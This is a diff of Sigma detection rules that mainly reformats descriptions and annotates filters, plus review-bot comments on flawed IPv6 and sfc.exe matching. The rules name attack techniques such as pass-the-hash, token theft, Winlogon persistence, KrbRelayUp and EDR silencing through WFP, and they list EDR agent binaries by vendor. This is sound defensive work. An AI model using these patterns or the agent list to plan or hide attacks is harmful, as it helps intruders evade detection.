@@ -16,8 +15,7 @@ references: - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html -author: "AlertIQ, J\xE1n Tren\u010Dansk\xFD, frack113, Nasreddine Bencherchali, Swachchhanda\ - \ Shrawan Poudel" +author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel date: 2022/08/01 modified: 2023/08/17 tags: diff --git a/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml b/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml index 571291a4b..409375bc0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml @@ -1,8 +1,7 @@ title: Winget Admin Settings Modification id: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 status: experimental -description: Detects changes to the AppInstaller (winget) admin settings. Such as - enabling local manifest installations or disabling installer hash checks +description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 
@@ -25,7 +24,6 @@ detection: ObjectName|endswith: \LocalState\admin_settings condition: registry_set and selection falsepositives: - - The event doesn't contain information about the type of change. False positives - are expected with legitimate changes + - The event doesn't contain information about the type of change. False positives are expected with legitimate changes level: low ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml b/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml index 8f11d91e6..aa0efb7ec 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml @@ -1,9 +1,7 @@ title: Enable Local Manifest Installation With Winget id: fa277e82-9b78-42dd-b05c-05555c7b6015 status: experimental -description: Detects changes to the AppInstaller (winget) policy. Specifically the - activation of the local manifest installation, which allows a user to install - new packages via custom manifests. +description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +22,6 @@ detection: NewValue: DWORD (0x00000001) condition: registry_set and selection falsepositives: - - Administrators or developers might enable this for testing purposes or to install - custom private packages + - Administrators or developers might enable this for testing purposes or to install custom private packages level: medium ruletype: Sigma 
diff --git a/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml index 068594733..03d88608d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml @@ -1,14 +1,10 @@ title: Winlogon AllowMultipleTSSessions Enable id: f7997770-92c3-4ec9-b112-774c4ef96f96 status: experimental -description: 'Detects when the ''AllowMultipleTSSessions'' value is enabled. - +description: | + Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. - - This is often used by attacker as a way to connect to an RDP session without disconnecting - the other users - - ' + This is often used by attacker as a way to connect to an RDP session without disconnecting the other users references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml b/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml index d30081a31..d479c4291 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml 
@@ -1,13 +1,9 @@ title: Winlogon Notify Key Logon Persistence id: bbf59793-6efb-4fa1-95ca-a7d288e52c88 status: test -description: 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables - when a user logs in. - - Winlogon.exe is a Windows component responsible for actions at logon/logoff as - well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - - ' +description: | + Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. + Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell author: frack113 diff --git a/sigma/builtin/security/account_management/win_security_access_token_abuse.yml b/sigma/builtin/security/account_management/win_security_access_token_abuse.yml index e40ec0077..5c6b320f3 100644 --- a/sigma/builtin/security/account_management/win_security_access_token_abuse.yml +++ b/sigma/builtin/security/account_management/win_security_access_token_abuse.yml @@ -1,9 +1,7 @@ title: Potential Access Token Abuse id: 02f7c9c1-1ae8-4c6a-8add-04693807f92f status: experimental -description: Detects potential token impersonation and theft. Example, when using - "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS - flag". +description: Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag". references: - https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation - https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html 
@@ -26,7 +24,7 @@ detection: LogonType: 9 LogonProcessName: Advapi AuthenticationPackageName: Negotiate - ImpersonationLevel: '%%1833' + ImpersonationLevel: '%%1833' # Impersonation condition: security and selection falsepositives: - Anti-Virus diff --git a/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml b/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml index 343505341..ad226a67f 100644 --- a/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml +++ b/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml @@ -16,9 +16,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Identifiable administrators usernames (pattern or special - unique character. ex: "Admin-*"), internal policy mandating use only as secondary - account' + definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account' detection: security: Channel: Security diff --git a/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml b/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml index 411ac3b41..bb2ba5c7a 100644 --- a/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml +++ b/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml 
@@ -1,11 +1,10 @@ title: A Member Was Added to a Security-Enabled Global Group id: c43c26be-2e87-46c7-8661-284588c5a53e related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable -description: Detects activity when a member is added to a security-enabled global - group +description: Detects activity when a member is added to a security-enabled global group references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -25,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 4728 - - 632 + - 4728 # A member was added to a security-enabled global group + - 632 # Security Enabled Global Group Member Added condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml b/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml index 7ff84b48d..52187f1fc 100644 --- a/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml +++ b/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml @@ -1,11 +1,10 @@ title: A Member Was Removed From a Security-Enabled Global Group id: 02c39d30-02b5-45d2-b435-8aebfe5a8629 related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable -description: Detects activity when a member is removed from a security-enabled global - group +description: Detects activity when a member is removed from a security-enabled global group references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf 
@@ -25,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 633 - - 4729 + - 633 # Security Enabled Global Group Member Removed + - 4729 # A member was removed from a security-enabled global group condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml b/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml index 30d13f699..1ebcd3141 100644 --- a/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml +++ b/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml @@ -1,8 +1,7 @@ title: Successful Overpass the Hash Attempt id: 192a0330-c20b-4356-90b6-7b7049ae0b87 status: test -description: Detects successful logon with logon type 9 (NewCredentials) which matches - the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. +description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. references: - https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html author: Roberto Rodriguez (source), Dominik Schaudel (rule) diff --git a/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml b/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml index 2100aa5cf..cdb3e807d 100644 --- a/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml +++ b/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml 
@@ -1,8 +1,7 @@ title: Pass the Hash Activity 2 id: 8eef149c-bd26-49f2-9e5a-9b00e3af499b status: stable -description: Detects the attack technique pass the hash which is used to move laterally - inside the network +description: Detects the attack technique pass the hash which is used to move laterally inside the network references: - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events - https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis @@ -16,8 +15,7 @@ tags: logsource: product: windows service: security - definition: The successful use of PtH for lateral movement between workstations - would trigger event ID 4624 + definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624 detection: security: Channel: Security diff --git a/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml b/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml index e6da0afaf..9b660e135 100644 --- a/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml +++ b/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml @@ -1,8 +1,7 @@ title: Scanner PoC for CVE-2019-0708 RDP RCE Vuln id: 8400629e-79a9-4737-b387-5db940ab2367 status: test -description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable - to CVE-2019-0708 RDP RCE aka BlueKeep +description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep references: - https://twitter.com/AdamTheAnalyst/status/1134394070045003776 - https://github.com/zerosum0x0/CVE-2019-0708 diff --git a/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml b/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml index 4667a26e6..7c509e3f5 100644 
--- a/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml +++ b/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml @@ -1,8 +1,7 @@ title: Remote WMI ActiveScriptEventConsumers id: 9599c180-e3a8-4743-8f92-7fb96d3be648 status: test -description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers - remotely to move laterally in a network +description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network references: - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml b/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml index dad6363f2..2e88c96cb 100644 --- a/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml +++ b/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml @@ -1,8 +1,8 @@ title: A Security-Enabled Global Group Was Deleted id: b237c54b-0f15-4612-a819-44b735e0de27 related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable description: Detects activity when a security-enabled global group is deleted references: @@ -24,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 4730 - - 634 + - 4730 # A security-enabled global group was deleted + - 634 # Security Enabled Global Group Deleted condition: security and selection falsepositives: - Unknown 
diff --git a/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml b/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml index 5d5c72929..0ca98a9cb 100644 --- a/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml +++ b/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml @@ -1,11 +1,10 @@ title: External Remote RDP Logon from Public IP id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 related: - - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc - type: derived + - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc + type: derived status: experimental -description: Detects successful logon from public IP address via RDP. This can indicate - a publicly-exposed RDP port. +description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. references: - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html - https://twitter.com/Purp1eW0lf/status/1616144561965002752 @@ -34,16 +33,15 @@ detection: - 172.16.0.0/12 - 192.168.0.0/16 filter_ipv6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80:' - - fc - - fd + - IpAddress: ::1 # IPv6 loopback + - IpAddress|startswith: + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_empty: IpAddress: '-' condition: security and (selection and not 1 of filter_*) falsepositives: - - Legitimate or intentional inbound connections from public IP addresses on the - RDP port. + - Legitimate or intentional inbound connections from public IP addresses on the RDP port. level: medium ruletype: Sigma diff --git a/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml b/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml index a3bc2b698..6b619a7d5 100644 
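Review bot: The new comment on `'fe80:'` labels it link-local, but the link-local block is fe80::/10 (fe80: through febf:), so this `startswith` value only excludes the first /16 of it; an address in fe81:–febf: would still be reported as a public-IP logon. Hosts autoconfigure fe80:: in practice, so the miss is narrow, but the comment should say what is actually excluded: `- 'fe80:' # link-local (fe80::/10; only the fe80: prefix is filtered here)`. The `fc` and `fd` entries together do cover fc00::/7 as their comments state. The same filter_ipv6 block and comments are added in the win_security_successful_external_remote_smb_login.yml hunk.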
--- a/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml +++ b/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml @@ -1,11 +1,10 @@ title: External Remote SMB Logon from Public IP id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc related: - - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 - type: derived + - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 + type: derived status: experimental -description: Detects successful logon from public IP address via SMB. This can indicate - a publicly-exposed SMB port. +description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. references: - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html - https://twitter.com/Purp1eW0lf/status/1616144561965002752 @@ -34,16 +33,15 @@ detection: - 172.16.0.0/12 - 192.168.0.0/16 filter_ipv6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80:' - - fc - - fd + - IpAddress: ::1 # IPv6 loopback + - IpAddress|startswith: + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_empty: IpAddress: '-' condition: security and (selection and not 1 of filter_*) falsepositives: - - Legitimate or intentional inbound connections from public IP addresses on the - SMB port. + - Legitimate or intentional inbound connections from public IP addresses on the SMB port. level: high ruletype: Sigma diff --git a/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml b/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml index 4596cbb43..dd9d4d1be 100644 --- a/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml +++ b/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml 
@@ -1,8 +1,7 @@ title: Failed Logon From Public IP id: f88e112a-21aa-44bd-9b01-6ee2a2bbbed1 status: test -description: A login from a public IP can indicate a misconfigured firewall or network - boundary. +description: A login from a public IP can indicate a misconfigured firewall or network boundary. author: NVISO date: 2020/05/06 modified: 2023/01/11 @@ -24,9 +23,9 @@ detection: IpAddress|contains: '-' filter_ip_privatev4: IpAddress|startswith: - - '10.' - - 192.168. - - 172.16. + - '10.' # 10.0.0.0/8 + - 192.168. # 192.168.0.0/16 + - 172.16. # 172.16.0.0/12 - 172.17. - 172.18. - 172.19. @@ -42,13 +41,13 @@ detection: - 172.29. - 172.30. - 172.31. - - '127.' - - 169.254. + - '127.' # 127.0.0.0/8 + - 169.254. # 169.254.0.0/16 filter_ip_privatev6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80::' - - 'fc00::' + - IpAddress: ::1 # loopback + - IpAddress|startswith: + - 'fe80::' # link-local + - 'fc00::' # unique local condition: security and (selection and not 1 of filter_*) falsepositives: - Legitimate logon attempts over the internet diff --git a/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml b/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml index 9d93a03f5..bbd56a52a 100644 --- a/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml +++ b/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml 
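Review bot: The new comment on `'fc00::'` calls it unique local, but the ULA block is fc00::/7 and addresses assigned in practice fall in fd00::/8, which `startswith: 'fc00::'` never matches, so such failed logons are still reported as coming from a public IP. The RDP and SMB rules touched in this same commit filter the block with the `fc` and `fd` prefixes; aligning this rule to `- fc # unique local fc00::/7` and `- fd # unique local fc00::/7` would make the three consistent. Likewise the comment `# 172.16.0.0/12` sits on the `172.16.` entry, which by itself only covers 172.16.0.0/16; the rest of the /12 is the 172.17.–172.31. entries below it, so the comment belongs on the group rather than the first line.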
@@ -1,8 +1,7 @@ title: KrbRelayUp Attack Pattern id: 749c9f5e-b353-4b90-a9c1-05243357ca4b status: test -description: Detects logon events that have characteristics of events generated during - an attack with KrbRelayUp and the like +description: Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like references: - https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g - https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml diff --git a/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml b/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml index 5a27b50ca..3ce1d85ff 100644 --- a/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml +++ b/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml @@ -1,8 +1,7 @@ title: RottenPotato Like Attack Pattern id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f status: test -description: Detects logon events that have characteristics of events generated during - an attack with RottenPotato and the like +description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like references: - https://twitter.com/SBousseaden/status/1195284233729777665 author: '@SBousseaden, Florian Roth' diff --git a/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml b/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml index 103e59aac..ee1f39b9f 100644 --- a/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml +++ b/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml 
@@ -1,13 +1,9 @@ title: Windows Filtering Platform Blocked Connection From EDR Agent Binary id: bacf58c6-e199-4040-a94f-95dea0f1e45a status: experimental -description: 'Detects a Windows Filtering Platform (WFP) blocked connection event - involving common Endpoint Detection and Response (EDR) agents. - - Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) - agents from reporting security events. - - ' +description: | + Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. + Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events. references: - https://github.com/netero1010/EDRSilencer - https://github.com/amjcyber/EDRNoiseMaker 
@@ -27,75 +23,75 @@ detection: selection: EventID: 5157 Application|endswith: - - \AmSvc.exe - - \cb.exe - - \CETASvc.exe - - \CNTAoSMgr.exe - - \CrAmTray.exe - - \CrsSvc.exe - - \CSFalconContainer.exe - - \CSFalconService.exe - - \CybereasonAV.exe - - \CylanceSvc.exe - - \cyserver.exe - - \CyveraService.exe - - \CyvrFsFlt.exe - - \EIConnector.exe - - \elastic-agent.exe - - \elastic-endpoint.exe - - \EndpointBasecamp.exe - - \ExecutionPreventionSvc.exe - - \filebeat.exe - - \fortiedr.exe - - \hmpalert.exe - - \hurukai.exe - - \LogProcessorService.exe - - \mcsagent.exe - - \mcsclient.exe - - \MsMpEng.exe - - \MsSense.exe - - \Ntrtscan.exe - - \PccNTMon.exe - - \QualysAgent.exe - - \RepMgr.exe - - \RepUtils.exe - - \RepUx.exe - - \RepWAV.exe - - \RepWSC.exe - - \sedservice.exe - - \SenseCncProxy.exe - - \SenseIR.exe - - \SenseNdr.exe - - \SenseSampleUploader.exe - - \SentinelAgent.exe - - \SentinelAgentWorker.exe - - \SentinelBrowserNativeHost.exe - - \SentinelHelperService.exe - - \SentinelServiceHost.exe - - \SentinelStaticEngine.exe - - \SentinelStaticEngineScanner.exe - - \sfc.exe - - \sophos ui.exe - - \sophosfilescanner.exe - - \sophosfs.exe - - \sophoshealth.exe - - \sophosips.exe - - \sophosLivequeryservice.exe - - \sophosnetfilter.exe - - \sophosntpservice.exe - - \sophososquery.exe - - \sspservice.exe - - \TaniumClient.exe - - \TaniumCX.exe - - \TaniumDetectEngine.exe - - \TMBMSRV.exe - - \TmCCSF.exe - - \TmListen.exe - - \TmWSCSvc.exe - - \Traps.exe - - \winlogbeat.exe - - \WSCommunicator.exe - - \xagt.exe + - \AmSvc.exe # Cybereason + - \cb.exe # Carbon Black EDR + - \CETASvc.exe # TrendMicro Apex One + - \CNTAoSMgr.exe # TrendMicro Apex One + - \CrAmTray.exe # Cybereason + - \CrsSvc.exe # Cybereason + - \CSFalconContainer.exe # CrowdStrike Falcon + - \CSFalconService.exe # CrowdStrike Falcon + - \CybereasonAV.exe # Cybereason + - \CylanceSvc.exe # Cylance + - \cyserver.exe # Palo Alto Networks Traps/Cortex XDR + - \CyveraService.exe # Palo Alto Networks 
Traps/Cortex XDR + - \CyvrFsFlt.exe # Palo Alto Networks Traps/Cortex XDR + - \EIConnector.exe # ESET Inspect + - \elastic-agent.exe # Elastic EDR + - \elastic-endpoint.exe # Elastic EDR + - \EndpointBasecamp.exe # TrendMicro Apex One + - \ExecutionPreventionSvc.exe # Cybereason + - \filebeat.exe # Elastic EDR + - \fortiedr.exe # FortiEDR + - \hmpalert.exe # Sophos EDR + - \hurukai.exe # Harfanglab EDR + - \LogProcessorService.exe # SentinelOne + - \mcsagent.exe # Sophos EDR + - \mcsclient.exe # Sophos EDR + - \MsMpEng.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \MsSense.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \Ntrtscan.exe # TrendMicro Apex One + - \PccNTMon.exe # TrendMicro Apex One + - \QualysAgent.exe # Qualys EDR + - \RepMgr.exe # Carbon Black Cloud + - \RepUtils.exe # Carbon Black Cloud + - \RepUx.exe # Carbon Black Cloud + - \RepWAV.exe # Carbon Black Cloud + - \RepWSC.exe # Carbon Black Cloud + - \sedservice.exe # Sophos EDR + - \SenseCncProxy.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseIR.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseNdr.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseSampleUploader.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SentinelAgent.exe # SentinelOne + - \SentinelAgentWorker.exe # SentinelOne + - \SentinelBrowserNativeHost.exe # SentinelOne + - \SentinelHelperService.exe # SentinelOne + - \SentinelServiceHost.exe # SentinelOne + - \SentinelStaticEngine.exe # SentinelOne + - \SentinelStaticEngineScanner.exe # SentinelOne + - \sfc.exe # Cisco Secure Endpoint (Formerly Cisco AMP) + - \sophos ui.exe # Sophos EDR + - \sophosfilescanner.exe # Sophos EDR + - \sophosfs.exe # Sophos EDR + - \sophoshealth.exe # Sophos EDR + - \sophosips.exe # Sophos EDR + - \sophosLivequeryservice.exe # Sophos EDR + - \sophosnetfilter.exe # Sophos EDR + - 
\sophosntpservice.exe # Sophos EDR + - \sophososquery.exe # Sophos EDR + - \sspservice.exe # Sophos EDR + - \TaniumClient.exe # Tanium + - \TaniumCX.exe # Tanium + - \TaniumDetectEngine.exe # Tanium + - \TMBMSRV.exe # TrendMicro Apex One + - \TmCCSF.exe # TrendMicro Apex One + - \TmListen.exe # TrendMicro Apex One + - \TmWSCSvc.exe # TrendMicro Apex One + - \Traps.exe # Palo Alto Networks Traps/Cortex XDR + - \winlogbeat.exe # Elastic EDR + - \WSCommunicator.exe # TrendMicro Apex One + - \xagt.exe # Trellix EDR condition: security and selection falsepositives: - Unlikely diff --git a/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml b/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml index f5dc92567..02892ab2a 100644 --- a/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml +++ b/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml @@ -1,14 +1,9 @@ title: Azure AD Health Monitoring Agent Registry Keys Access id: ff151c33-45fa-475d-af4f-c2f93571f4fe status: test -description: 'This detection uses Windows security events to detect suspicious access - attempts to the registry key of Azure AD Health monitoring agent. - - This detection requires an access control entry (ACE) on the system access control - list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft - Online\Reporting\MonitoringAgent. - - ' +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. references: - https://o365blog.com/post/hybridhealthagent/ - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml 
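Review bot: The annotation `\sfc.exe # Cisco Secure Endpoint (Formerly Cisco AMP)` should also record that sfc.exe is the name of the Windows System File Checker binary shipped under System32, so an `endswith` match on that name is not specific to the EDR agent and a 5157 involving the built-in tool would be an unlikely but possible false positive. Suggest `- \sfc.exe # Cisco Secure Endpoint (formerly Cisco AMP); name collides with the Windows System File Checker sfc.exe`. The rest of the hunk only adds vendor annotations, which help triage without changing the match set.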
diff --git a/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml b/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml index 36bd82de8..f82687bf6 100644 --- a/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml +++ b/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml @@ -1,19 +1,11 @@ title: Azure AD Health Service Agents Registry Keys Access id: 1d2ab8ac-1a01-423b-9c39-001510eae8e8 status: test -description: 'This detection uses Windows security events to detect suspicious access - attempts to the registry key values and sub-keys of Azure AD Health service agents - (e.g AD FS). - - Information from AD Health service agents can be used to potentially abuse some - of the features provided by those services in the cloud (e.g. Federation). - - This detection requires an access control entry (ACE) on the system access control - list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. - +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). + Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys. - - ' references: - https://o365blog.com/post/hybridhealthagent/ - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml diff --git a/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml b/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml index fa2ad56c6..5377c91fa 100644 
